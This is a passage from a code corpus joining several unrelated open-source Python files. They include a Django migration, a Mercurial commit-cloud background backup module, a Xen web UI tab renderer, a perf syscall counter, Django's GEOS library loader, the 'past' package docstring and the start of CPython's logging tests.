'practice': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'treks'", 'null': 'True', 'db_column': "'pratique'", 'to': u"orm['trekking.Practice']"}),
'public_transport': ('django.db.models.fields.TextField', [], {'db_column': "'transport'", 'blank': 'True'}),
'publication_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'db_column': "'date_publication'", 'blank': 'True'}),
'published': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_column': "'public'"}),
'related_treks': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'related_treks+'", 'symmetrical': 'False', 'through': u"orm['trekking.TrekRelationship']", 'to': u"orm['trekking.Trek']"}),
'route': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'treks'", 'null': 'True', 'db_column': "'parcours'", 'to': u"orm['trekking.Route']"}),
'structure': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['authent.Structure']", 'db_column': "'structure'"}),
'themes': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'treks'", 'to': u"orm['common.Theme']", 'db_table': "'o_r_itineraire_theme'", 'blank': 'True', 'symmetrical': 'False', 'null': 'True'}),
'topo_object': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['core.Topology']", 'unique': 'True', 'primary_key': 'True', 'db_column': "'evenement'"}),
'web_links': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'treks'", 'to': u"orm['trekking.WebLink']", 'db_table': "'o_r_itineraire_web'", 'blank': 'True', 'symmetrical': 'False', 'null': 'True'})
},
u'trekking.treknetwork': {
'Meta': {'ordering': "['network']", 'object_name': 'TrekNetwork', 'db_table': "'o_b_reseau'"},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'network': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_column': "'reseau'"}),
'pictogram': ('django.db.models.fields.files.FileField', [], {'max_length': '512', 'null': 'True', 'db_column': "'picto'"})
},
u'trekking.trekrelationship': {
'Meta': {'unique_together': "(('trek_a', 'trek_b'),)", 'object_name': 'TrekRelationship', 'db_table': "'o_r_itineraire_itineraire'"},
'has_common_departure': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_column': "'depart_commun'"}),
'has_common_edge': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_column': "'troncons_communs'"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_circuit_step': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_column': "'etape_circuit'"}),
'trek_a': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'trek_relationship_a'", 'db_column': "'itineraire_a'", 'to': u"orm['trekking.Trek']"}),
'trek_b': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'trek_relationship_b'", 'db_column': "'itineraire_b'", 'to': u"orm['trekking.Trek']"})
},
u'trekking.weblink': {
'Meta': {'ordering': "['name']", 'object_name': 'WebLink', 'db_table': "'o_t_web'"},
'category': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'links'", 'null': 'True', 'db_column': "'categorie'", 'to': u"orm['trekking.WebLinkCategory']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_column': "'nom'"}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '128', 'db_column': "'url'"})
},
u'trekking.weblinkcategory': {
'Meta': {'ordering': "['label']", 'object_name': 'WebLinkCategory', 'db_table': "'o_b_web_category'"},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_column': "'nom'"}),
'pictogram': ('django.db.models.fields.files.FileField', [], {'max_length': '512', 'null': 'True', 'db_column': "'picto'"})
}
}
complete_apps = ['trekking']
| bsd-2-clause |
facebookexperimental/eden | eden/hg-server/edenscm/hgext/commitcloud/background.py | 1 | 10766 | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2.
"""background backup and sync
This module allows automatic backup or sync operations to be started after
every command that modifies the repo.
Automatic backups are enabled by setting the 'infinitepushbackup.autobackup'
config option to true.
Automatic backups can be temporarily disabled by setting
'infinitepushbackup.disableduntil' to a unix timestamp, or by running 'hg cloud
disable', which stores the disable time in the autobackup state file
('commitcloud/autobackup'). If both of these are set then backups are disabled
until both of them have expired.
The output from background backup or sync operations is logged to a directory
configured in the 'infinitepushbackup.logdir' config option.
"""
from __future__ import absolute_import
import errno
import json
import os
import stat
import time
import bindings
from edenscm.mercurial import (
dispatch,
encoding,
error,
extensions,
localrepo,
pycompat,
util,
)
from edenscm.mercurial.i18n import _
from . import util as ccutil, workspace
def extsetup(ui):
extensions.wrapfunction(dispatch, "runcommand", _runcommand)
extensions.wrapfunction(localrepo.localrepository, "transaction", _transaction)
# Autobackup state
#
# The autobackupstatefile contains a JSON object containing state for
# commitcloud automatic backups.
#
# Valid fields are:
#
# "disableduntil" - An integer unixtime that automatic backup is disabled until.
_autobackupstatefile = "commitcloud/autobackup"
def loadautobackupstate(repo):
try:
with repo.sharedvfs.open(_autobackupstatefile) as f:
return json.load(f)
except IOError as e:
if e.errno != errno.ENOENT:
raise
except Exception:
repo.ui.warn(_("invalid commitcloud autobackup state - ignoring\n"))
return {}
def saveautobackupstate(repo, state):
repo.sharedvfs.makedirs("commitcloud")
with repo.sharedvfs.open(_autobackupstatefile, "w", atomictemp=True) as f:
f.write(pycompat.encodeutf8(json.dumps(state)))
def disableautobackup(repo, until):
state = loadautobackupstate(repo)
if until is not None:
state["disableduntil"] = until
else:
state.pop("disableduntil", None)
saveautobackupstate(repo, state)
def autobackupdisableduntil(repo):
"""returns the timestamp that backup disable expires at
Backup can be disabled by the user, either in config, or by running
'hg cloud disable', which stores its state in the autobackup state.
"""
# developer config: infinitepushbackup.disableduntil
disableduntilconf = repo.ui.configint("infinitepushbackup", "disableduntil", None)
disableduntilstate = util.parseint(loadautobackupstate(repo).get("disableduntil"))
if disableduntilconf is None:
return disableduntilstate
if disableduntilstate is None:
return disableduntilconf
return max(disableduntilconf, disableduntilstate)
def autobackupenabled(repo):
# Backup is possibly disabled by user, but the disabling might have expired.
# developer config: infinitepushbackup.disableduntil
timestamp = autobackupdisableduntil(repo)
if timestamp is not None and time.time() <= timestamp:
return False
return repo.ui.configbool("infinitepushbackup", "autobackup")
def _runcommand(orig, lui, repo, cmd, fullargs, *args):
"""start an automatic backup or cloud sync after every command
Since we don't want to start auto backup after read-only commands,
then this wrapper checks if this command opened at least one transaction.
If yes then background backup will be started.
"""
try:
return orig(lui, repo, cmd, fullargs, *args)
finally:
# For chg, do not wrap the "serve" runcommand call. Otherwise, if
# autobackup is enabled for the repo, and a transaction was opened
# to modify the repo, start an automatic background backup.
if (
"CHGINTERNALMARK" not in encoding.environ
and repo is not None
and autobackupenabled(repo)
and getattr(repo, "txnwasopened", False)
and not getattr(repo, "ignoreautobackup", False)
):
lui.debug("starting commit cloud autobackup in the background\n")
backgroundbackup(repo)
def _transaction(orig, self, *args, **kwargs):
"""record if a transaction was opened
If a transaction was opened then we want to start a background backup or
cloud sync. Record the fact that transaction was opened.
"""
self.txnwasopened = True
return orig(self, *args, **kwargs)
def backgroundbackupother(repo, dest=None):
"""start background backup for the other remote
Commit cloud can be configured to back up to a secondary backup server by
setting the 'infinitepush-other' remote to the path to the secondary server.
If this is set, and it differs from the main 'infinitepush' remote, start
background backup for the other remote.
"""
other = "infinitepush-other"
try:
remotepath = repo.ui.paths.getpath(other)
except error.RepoError:
remotepath = None
if remotepath and remotepath.loc != ccutil.getremotepath(repo, dest):
repo.ui.debug("starting background backup to %s\n" % remotepath.loc)
backgroundbackup(repo, ["hg", "cloud", "backup"], dest=other)
def backgroundbackup(repo, command=None, dest=None):
"""start background backup"""
ui = repo.ui
if command is not None:
background_cmd = command
elif workspace.currentworkspace(repo):
background_cmd = ["hg", "cloud", "sync"]
else:
background_cmd = ["hg", "cloud", "backup"]
infinitepush_bgssh = ui.config("infinitepush", "bgssh")
if infinitepush_bgssh:
background_cmd += ["--config", "ui.ssh=%s" % infinitepush_bgssh]
# developer config: infinitepushbackup.bgdebuglocks
if ui.configbool("infinitepushbackup", "bgdebuglocks"):
background_cmd += ["--config", "devel.debug-lockers=true"]
# developer config: infinitepushbackup.bgdebug
if ui.configbool("infinitepushbackup", "bgdebug", False):
background_cmd.append("--debug")
if dest:
background_cmd += ["--dest", dest]
logfile = None
logdir = ui.config("infinitepushbackup", "logdir")
if logdir:
# make newly created files and dirs non-writable
oldumask = os.umask(0o022)
try:
try:
# the user name from the machine
username = util.getuser()
except Exception:
username = "unknown"
if not _checkcommonlogdir(logdir):
raise WrongPermissionsException(logdir)
userlogdir = os.path.join(logdir, username)
util.makedirs(userlogdir)
if not _checkuserlogdir(userlogdir):
raise WrongPermissionsException(userlogdir)
reponame = os.path.basename(repo.sharedroot)
_removeoldlogfiles(userlogdir, reponame)
logfile = getlogfilename(logdir, username, reponame)
except (OSError, IOError) as e:
ui.debug("background backup log is disabled: %s\n" % e)
except WrongPermissionsException as e:
ui.debug(
(
"%s directory has incorrect permission, "
+ "background backup logging will be disabled\n"
)
% e.logdir
)
finally:
os.umask(oldumask)
if not logfile:
logfile = os.devnull
with open(logfile, "a") as f:
timestamp = util.datestr(util.makedate(), "%Y-%m-%d %H:%M:%S %z")
fullcmd = " ".join(util.shellquote(arg) for arg in background_cmd)
f.write("\n%s starting: %s\n" % (timestamp, fullcmd))
Stdio = bindings.process.Stdio
out = Stdio.open(logfile, append=True, create=True)
bindings.process.Command.new(background_cmd[0]).args(
background_cmd[1:]
).avoidinherithandles().newsession().stdin(Stdio.null()).stdout(out).stderr(
out
).spawn()
class WrongPermissionsException(Exception):
def __init__(self, logdir):
self.logdir = logdir
_timeformat = "%Y%m%d"
def getlogfilename(logdir, username, reponame):
"""Returns name of the log file for particular user and repo
Different users have different directories inside logdir. Log filename
consists of reponame (basename of repo path) and current day
(see _timeformat). That means that two different repos with the same name
can share the same log file. This is not a big problem so we ignore it.
"""
currentday = time.strftime(_timeformat)
return os.path.join(logdir, username, reponame + currentday)
def _removeoldlogfiles(userlogdir, reponame):
existinglogfiles = []
for entry in util.listdir(userlogdir):
filename = entry[0]
fullpath = os.path.join(userlogdir, filename)
if filename.startswith(reponame) and os.path.isfile(fullpath):
try:
time.strptime(filename[len(reponame) :], _timeformat)
except ValueError:
continue
existinglogfiles.append(filename)
# _timeformat gives us a property that if we sort log file names in
# descending order then newer files are going to be in the beginning
existinglogfiles = sorted(existinglogfiles, reverse=True)
# Delete logs that are older than 5 days
maxlogfilenumber = 5
if len(existinglogfiles) > maxlogfilenumber:
for filename in existinglogfiles[maxlogfilenumber:]:
os.unlink(os.path.join(userlogdir, filename))
def _checkcommonlogdir(logdir):
"""Checks permissions of the log directory
We want log directory to actually be a directory, have restricting
deletion flag set (sticky bit)
"""
try:
st = os.stat(logdir)
return stat.S_ISDIR(st.st_mode) and st.st_mode & stat.S_ISVTX
except OSError:
# is raised by os.stat()
return False
def _checkuserlogdir(userlogdir):
"""Checks permissions of the user log directory
We want user log directory to be writable only by the user who created it
and be owned by `username`
"""
try:
st = os.stat(userlogdir)
# Check that `userlogdir` is owned by `username`
if os.getuid() != st.st_uid:
return False
return (
st.st_mode & (stat.S_IWUSR | stat.S_IWGRP | stat.S_IWOTH)
) == stat.S_IWUSR
except OSError:
# is raised by os.stat()
return False
| gpl-2.0 |
jpaton/xen-4.1-LJX1 | tools/python/xen/sv/GenTabbed.py | 46 | 4954 | import types
from xen.sv.HTMLBase import HTMLBase
from xen.sv.util import getVar
class GenTabbed( HTMLBase ):
def __init__( self, title, urlWriter, tabStrings, tabObjects ):
HTMLBase.__init__(self)
self.tabStrings = tabStrings
self.tabObjects = tabObjects
self.urlWriter = urlWriter
self.title = title
def write_BODY( self, request ):
if not self.__dict__.has_key( "tab" ):
try:
self.tab = int( getVar( 'tab', request, 0 ) )
except:
self.tab = 0
request.write( "\n<div class='title'>%s</div>" % self.title )
TabView( self.tab, self.tabStrings, self.urlWriter ).write_BODY( request )
try:
request.write( "\n<div class='tab'>" )
render_tab = self.tabObjects[ self.tab ]
render_tab( self.urlWriter ).write_BODY( request )
request.write( "\n</div>" )
except Exception, e:
request.write( "\n<p>Error Rendering Tab</p>" )
request.write( "\n<p>%s</p>" % str( e ) )
request.write( "\n<input type=\"hidden\" name=\"tab\" value=\"%d\">" % self.tab )
def perform( self, request ):
request.write( "Tab> perform" )
request.write( "<br/>op: " + str( getVar( 'op', request ) ) )
request.write( "<br/>args: " + str( getVar( 'args', request ) ) )
request.write( "<br/>tab: " + str( getVar( 'tab', request ) ) )
try:
action = getVar( 'op', request, 0 )
if action == "tab":
self.tab = int( getVar( 'args', request ) )
else:
this.tab = int( getVar( 'tab', request, 0 ) )
self.tabObjects[ self.tab ]( self.urlWriter ).perform( request )
except:
pass
class PreTab( HTMLBase ):
def __init__( self, source ):
HTMLBase.__init__( self )
self.source = source
def write_BODY( self, request ):
request.write( "\n<pre>" )
request.write( self.source )
request.write( "\n</pre>" )
class GeneralTab( HTMLBase ):
def __init__( self, dict, titles ):
HTMLBase.__init__( self )
self.dict = dict
self.titles = titles
def write_BODY( self, request ):
request.write( "\n<table width='100%' cellspacing='0' cellpadding='0' border='0'>" )
def writeAttr( niceName, attr, formatter=None ):
if type( attr ) is types.TupleType:
( attr, formatter ) = attr
if attr in self.dict:
if formatter:
temp = formatter( self.dict[ attr ] )
else:
temp = str( self.dict[ attr ] )
request.write( "\n<tr><td width='50%%'><p>%s:</p></td><td width='50%%'><p>%s</p></td></tr>" % ( niceName, temp ) )
for niceName, attr in self.titles.items():
writeAttr( niceName, attr )
request.write( "</table>" )
class NullTab( HTMLBase ):
def __init__( self, title="Null Tab" ):
HTMLBase.__init__( self )
self.title = title
def write_BODY( self, request ):
request.write( "\n<p>%s</p>" % self.title )
class ActionTab( HTMLBase ):
def __init__( self, actions ):
self.actions = actions
HTMLBase.__init__( self )
def write_BODY( self, request ):
for item in self.actions.items():
try:
((op, attr), title) = item
except:
(op, title) = item
attr = ""
request.write( "\n<div class='button' onclick=\"doOp2( '%s', '%s' )\">%s</a></div>" % (op, attr, title) )
class CompositeTab( HTMLBase ):
def __init__( self, tabs, urlWriter ):
HTMLBase.__init__( self )
self.tabs = tabs
self.urlWriter = urlWriter
def write_BODY( self, request ):
for tab in self.tabs:
tab( self.urlWriter ).write_BODY( request )
def perform( self, request ):
for tab in self.tabs:
tab( self.urlWriter ).perform( request )
class TabView( HTMLBase ):
# tab - int, id into tabs of selected tab
# tabs - list of strings, tab names
# urlWriter -
def __init__( self, tab, tabs, urlWriter ):
HTMLBase.__init__(self)
self.tab = tab
self.tabs = tabs
self.urlWriter = urlWriter
def write_BODY( self, request ):
for i in range( len( self.tabs ) ):
if self.tab == i:
at = " id='activeTab'"
else:
at = ""
request.write( "\n<div%s class='tabButton' onclick=\"doOp2( 'tab', '%d' )\">%s</div>" % ( at, i, self.tabs[ i ] ) )
| gpl-2.0 |
kangsterizer/linux-3.1.y-rsbac | tools/perf/scripts/python/syscall-counts.py | 11181 | 1522 | # system call counts
# (c) 2010, Tom Zanussi <[email protected]>
# Licensed under the terms of the GNU GPL License version 2
#
# Displays system-wide system call totals, broken down by syscall.
# If a [comm] arg is specified, only syscalls called by [comm] are displayed.
import os
import sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
from Util import syscall_name
usage = "perf script -s syscall-counts.py [comm]\n";
for_comm = None
if len(sys.argv) > 2:
sys.exit(usage)
if len(sys.argv) > 1:
for_comm = sys.argv[1]
syscalls = autodict()
def trace_begin():
print "Press control+C to stop and show the summary"
def trace_end():
print_syscall_totals()
def raw_syscalls__sys_enter(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
id, args):
if for_comm is not None:
if common_comm != for_comm:
return
try:
syscalls[id] += 1
except TypeError:
syscalls[id] = 1
def print_syscall_totals():
if for_comm is not None:
print "\nsyscall events for %s:\n\n" % (for_comm),
else:
print "\nsyscall events:\n\n",
print "%-40s %10s\n" % ("event", "count"),
print "%-40s %10s\n" % ("----------------------------------------", \
"-----------"),
for id, val in sorted(syscalls.iteritems(), key = lambda(k, v): (v, k), \
reverse = True):
print "%-40s %10d\n" % (syscall_name(id), val),
| gpl-2.0 |
isabernardes/Heriga | Herigaenv/lib/python2.7/site-packages/django/contrib/gis/geos/libgeos.py | 345 | 6218 | """
This module houses the ctypes initialization procedures, as well
as the notice and error handler function callbacks (get called
when an error occurs in GEOS).
This module also houses GEOS Pointer utilities, including
get_pointer_arr(), and GEOM_PTR.
"""
import logging
import os
import re
from ctypes import CDLL, CFUNCTYPE, POINTER, Structure, c_char_p
from ctypes.util import find_library
from django.contrib.gis.geos.error import GEOSException
from django.core.exceptions import ImproperlyConfigured
from django.utils.functional import SimpleLazyObject
logger = logging.getLogger('django.contrib.gis')
def load_geos():
# Custom library path set?
try:
from django.conf import settings
lib_path = settings.GEOS_LIBRARY_PATH
except (AttributeError, EnvironmentError,
ImportError, ImproperlyConfigured):
lib_path = None
# Setting the appropriate names for the GEOS-C library.
if lib_path:
lib_names = None
elif os.name == 'nt':
# Windows NT libraries
lib_names = ['geos_c', 'libgeos_c-1']
elif os.name == 'posix':
# *NIX libraries
lib_names = ['geos_c', 'GEOS']
else:
raise ImportError('Unsupported OS "%s"' % os.name)
# Using the ctypes `find_library` utility to find the path to the GEOS
# shared library. This is better than manually specifying each library name
# and extension (e.g., libgeos_c.[so|so.1|dylib].).
if lib_names:
for lib_name in lib_names:
lib_path = find_library(lib_name)
if lib_path is not None:
break
# No GEOS library could be found.
if lib_path is None:
raise ImportError(
'Could not find the GEOS library (tried "%s"). '
'Try setting GEOS_LIBRARY_PATH in your settings.' %
'", "'.join(lib_names)
)
# Getting the GEOS C library. The C interface (CDLL) is used for
# both *NIX and Windows.
# See the GEOS C API source code for more details on the library function calls:
# http://geos.refractions.net/ro/doxygen_docs/html/geos__c_8h-source.html
_lgeos = CDLL(lib_path)
# Here we set up the prototypes for the initGEOS_r and finishGEOS_r
# routines. These functions aren't actually called until they are
# attached to a GEOS context handle -- this actually occurs in
# geos/prototypes/threadsafe.py.
_lgeos.initGEOS_r.restype = CONTEXT_PTR
_lgeos.finishGEOS_r.argtypes = [CONTEXT_PTR]
return _lgeos
# The notice and error handler C function callback definitions.
# Supposed to mimic the GEOS message handler (C below):
# typedef void (*GEOSMessageHandler)(const char *fmt, ...);
NOTICEFUNC = CFUNCTYPE(None, c_char_p, c_char_p)
def notice_h(fmt, lst):
fmt, lst = fmt.decode(), lst.decode()
try:
warn_msg = fmt % lst
except TypeError:
warn_msg = fmt
logger.warning('GEOS_NOTICE: %s\n' % warn_msg)
notice_h = NOTICEFUNC(notice_h)
ERRORFUNC = CFUNCTYPE(None, c_char_p, c_char_p)
def error_h(fmt, lst):
fmt, lst = fmt.decode(), lst.decode()
try:
err_msg = fmt % lst
except TypeError:
err_msg = fmt
logger.error('GEOS_ERROR: %s\n' % err_msg)
error_h = ERRORFUNC(error_h)
# #### GEOS Geometry C data structures, and utility functions. ####
# Opaque GEOS geometry structures, used for GEOM_PTR and CS_PTR
class GEOSGeom_t(Structure):
pass
class GEOSPrepGeom_t(Structure):
pass
class GEOSCoordSeq_t(Structure):
pass
class GEOSContextHandle_t(Structure):
pass
# Pointers to opaque GEOS geometry structures.
GEOM_PTR = POINTER(GEOSGeom_t)
PREPGEOM_PTR = POINTER(GEOSPrepGeom_t)
CS_PTR = POINTER(GEOSCoordSeq_t)
CONTEXT_PTR = POINTER(GEOSContextHandle_t)
# Used specifically by the GEOSGeom_createPolygon and GEOSGeom_createCollection
# GEOS routines
def get_pointer_arr(n):
"Gets a ctypes pointer array (of length `n`) for GEOSGeom_t opaque pointer."
GeomArr = GEOM_PTR * n
return GeomArr()
lgeos = SimpleLazyObject(load_geos)
class GEOSFuncFactory(object):
"""
Lazy loading of GEOS functions.
"""
argtypes = None
restype = None
errcheck = None
def __init__(self, func_name, *args, **kwargs):
self.func_name = func_name
self.restype = kwargs.pop('restype', self.restype)
self.errcheck = kwargs.pop('errcheck', self.errcheck)
self.argtypes = kwargs.pop('argtypes', self.argtypes)
self.args = args
self.kwargs = kwargs
self.func = None
def __call__(self, *args, **kwargs):
if self.func is None:
self.func = self.get_func(*self.args, **self.kwargs)
return self.func(*args, **kwargs)
def get_func(self, *args, **kwargs):
from django.contrib.gis.geos.prototypes.threadsafe import GEOSFunc
func = GEOSFunc(self.func_name)
func.argtypes = self.argtypes or []
func.restype = self.restype
if self.errcheck:
func.errcheck = self.errcheck
return func
# Returns the string version of the GEOS library. Have to set the restype
# explicitly to c_char_p to ensure compatibility across 32 and 64-bit platforms.
geos_version = GEOSFuncFactory('GEOSversion', restype=c_char_p)
# Regular expression should be able to parse version strings such as
# '3.0.0rc4-CAPI-1.3.3', '3.0.0-CAPI-1.4.1', '3.4.0dev-CAPI-1.8.0' or '3.4.0dev-CAPI-1.8.0 r0'
version_regex = re.compile(
r'^(?P<version>(?P<major>\d+)\.(?P<minor>\d+)\.(?P<subminor>\d+))'
r'((rc(?P<release_candidate>\d+))|dev)?-CAPI-(?P<capi_version>\d+\.\d+\.\d+)( r\d+)?$'
)
def geos_version_info():
"""
Returns a dictionary containing the various version metadata parsed from
the GEOS version string, including the version number, whether the version
is a release candidate (and what number release candidate), and the C API
version.
"""
ver = geos_version().decode()
m = version_regex.match(ver)
if not m:
raise GEOSException('Could not parse version info string "%s"' % ver)
return {key: m.group(key) for key in (
'version', 'release_candidate', 'capi_version', 'major', 'minor', 'subminor')}
| mit |
ininex/geofire-python | resource/lib/python2.7/site-packages/past/__init__.py | 34 | 2948 | # coding=utf-8
"""
past: compatibility with Python 2 from Python 3
===============================================
``past`` is a package to aid with Python 2/3 compatibility. Whereas ``future``
contains backports of Python 3 constructs to Python 2, ``past`` provides
implementations of some Python 2 constructs in Python 3 and tools to import and
run Python 2 code in Python 3. It is intended to be used sparingly, as a way of
running old Python 2 code from Python 3 until the code is ported properly.
Potential uses for libraries:
- as a step in porting a Python 2 codebase to Python 3 (e.g. with the ``futurize`` script)
- to provide Python 3 support for previously Python 2-only libraries with the
same APIs as on Python 2 -- particularly with regard to 8-bit strings (the
``past.builtins.str`` type).
- to aid in providing minimal-effort Python 3 support for applications using
libraries that do not yet wish to upgrade their code properly to Python 3, or
wish to upgrade it gradually to Python 3 style.
Here are some code examples that run identically on Python 3 and 2::
>>> from past.builtins import str as oldstr
>>> philosopher = oldstr(u'\u5b54\u5b50'.encode('utf-8'))
>>> # This now behaves like a Py2 byte-string on both Py2 and Py3.
>>> # For example, indexing returns a Python 2-like string object, not
>>> # an integer:
>>> philosopher[0]
'\xe5'
>>> type(philosopher[0])
<past.builtins.oldstr>
>>> # List-producing versions of range, reduce, map, filter
>>> from past.builtins import range, reduce
>>> range(10)
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
>>> reduce(lambda x, y: x+y, [1, 2, 3, 4, 5])
15
>>> # Other functions removed in Python 3 are resurrected ...
>>> from past.builtins import execfile
>>> execfile('myfile.py')
>>> from past.builtins import raw_input
>>> name = raw_input('What is your name? ')
What is your name? [cursor]
>>> from past.builtins import reload
>>> reload(mymodule) # equivalent to imp.reload(mymodule) in Python 3
>>> from past.builtins import xrange
>>> for i in xrange(10):
... pass
It also provides import hooks so you can import and use Python 2 modules like
this::
$ python3
>>> from past import autotranslate
>>> authotranslate('mypy2module')
>>> import mypy2module
until the authors of the Python 2 modules have upgraded their code. Then, for
example::
>>> mypy2module.func_taking_py2_string(oldstr(b'abcd'))
Credits
-------
:Author: Ed Schofield
:Sponsor: Python Charmers Pty Ltd, Australia: http://pythoncharmers.com
Licensing
---------
Copyright 2013-2016 Python Charmers Pty Ltd, Australia.
The software is distributed under an MIT licence. See LICENSE.txt.
"""
from past.translation import install_hooks as autotranslate
from future import __version__, __copyright__, __license__
__title__ = 'past'
__author__ = 'Ed Schofield'
| mit |
denisff/python-for-android | python3-alpha/python3-src/Lib/test/test_logging.py | 47 | 76391 | #!/usr/bin/env python
#
# Copyright 2001-2011 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Test harness for the logging module. Run all tests.
Copyright (C) 2001-2011 Vinay Sajip. All Rights Reserved.
"""
import logging
import logging.handlers
import logging.config
import codecs
import datetime
import pickle
import io
import gc
import json
import os
import queue
import re
import select
import socket
from socketserver import ThreadingTCPServer, StreamRequestHandler
import struct
import sys
import tempfile
from test.support import captured_stdout, run_with_locale, run_unittest
from test.support import TestHandler, Matcher
import textwrap
import unittest
import warnings
import weakref
try:
import threading
except ImportError:
threading = None
class BaseTest(unittest.TestCase):
"""Base class for logging tests."""
log_format = "%(name)s -> %(levelname)s: %(message)s"
expected_log_pat = r"^([\w.]+) -> ([\w]+): ([\d]+)$"
message_num = 0
def setUp(self):
"""Setup the default logging stream to an internal StringIO instance,
so that we can examine log output as we want."""
logger_dict = logging.getLogger().manager.loggerDict
logging._acquireLock()
try:
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.saved_loggers = saved_loggers = logger_dict.copy()
self.saved_level_names = logging._levelNames.copy()
self.logger_states = logger_states = {}
for name in saved_loggers:
logger_states[name] = getattr(saved_loggers[name],
'disabled', None)
finally:
logging._releaseLock()
# Set two unused loggers: one non-ASCII and one Unicode.
# This is to test correct operation when sorting existing
# loggers in the configuration code. See issue 8201.
self.logger1 = logging.getLogger("\xab\xd7\xbb")
self.logger2 = logging.getLogger("\u013f\u00d6\u0047")
self.root_logger = logging.getLogger("")
self.original_logging_level = self.root_logger.getEffectiveLevel()
self.stream = io.StringIO()
self.root_logger.setLevel(logging.DEBUG)
self.root_hdlr = logging.StreamHandler(self.stream)
self.root_formatter = logging.Formatter(self.log_format)
self.root_hdlr.setFormatter(self.root_formatter)
if self.logger1.hasHandlers():
hlist = self.logger1.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
if self.logger2.hasHandlers():
hlist = self.logger2.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
self.root_logger.addHandler(self.root_hdlr)
self.assertTrue(self.logger1.hasHandlers())
self.assertTrue(self.logger2.hasHandlers())
def tearDown(self):
"""Remove our logging stream, and restore the original logging
level."""
self.stream.close()
self.root_logger.removeHandler(self.root_hdlr)
while self.root_logger.handlers:
h = self.root_logger.handlers[0]
self.root_logger.removeHandler(h)
h.close()
self.root_logger.setLevel(self.original_logging_level)
logging._acquireLock()
try:
logging._levelNames.clear()
logging._levelNames.update(self.saved_level_names)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
loggerDict = logging.getLogger().manager.loggerDict
loggerDict.clear()
loggerDict.update(self.saved_loggers)
logger_states = self.logger_states
for name in self.logger_states:
if logger_states[name] is not None:
self.saved_loggers[name].disabled = logger_states[name]
finally:
logging._releaseLock()
def assert_log_lines(self, expected_values, stream=None):
"""Match the collected log lines against the regular expression
self.expected_log_pat, and compare the extracted group values to
the expected_values list of tuples."""
stream = stream or self.stream
pat = re.compile(self.expected_log_pat)
try:
stream.reset()
actual_lines = stream.readlines()
except AttributeError:
# StringIO.StringIO lacks a reset() method.
actual_lines = stream.getvalue().splitlines()
self.assertEqual(len(actual_lines), len(expected_values),
'%s vs. %s' % (actual_lines, expected_values))
for actual, expected in zip(actual_lines, expected_values):
match = pat.search(actual)
if not match:
self.fail("Log line does not match expected pattern:\n" +
actual)
self.assertEqual(tuple(match.groups()), expected)
s = stream.read()
if s:
self.fail("Remaining output at end of log stream:\n" + s)
def next_message(self):
"""Generate a message consisting solely of an auto-incrementing
integer."""
self.message_num += 1
return "%d" % self.message_num
class BuiltinLevelsTest(BaseTest):
"""Test builtin levels and their inheritance."""
def test_flat(self):
#Logging levels in a flat logger namespace.
m = self.next_message
ERR = logging.getLogger("ERR")
ERR.setLevel(logging.ERROR)
INF = logging.LoggerAdapter(logging.getLogger("INF"), {})
INF.setLevel(logging.INFO)
DEB = logging.getLogger("DEB")
DEB.setLevel(logging.DEBUG)
# These should log.
ERR.log(logging.CRITICAL, m())
ERR.error(m())
INF.log(logging.CRITICAL, m())
INF.error(m())
INF.warn(m())
INF.info(m())
DEB.log(logging.CRITICAL, m())
DEB.error(m())
DEB.warn (m())
DEB.info (m())
DEB.debug(m())
# These should not log.
ERR.warn(m())
ERR.info(m())
ERR.debug(m())
INF.debug(m())
self.assert_log_lines([
('ERR', 'CRITICAL', '1'),
('ERR', 'ERROR', '2'),
('INF', 'CRITICAL', '3'),
('INF', 'ERROR', '4'),
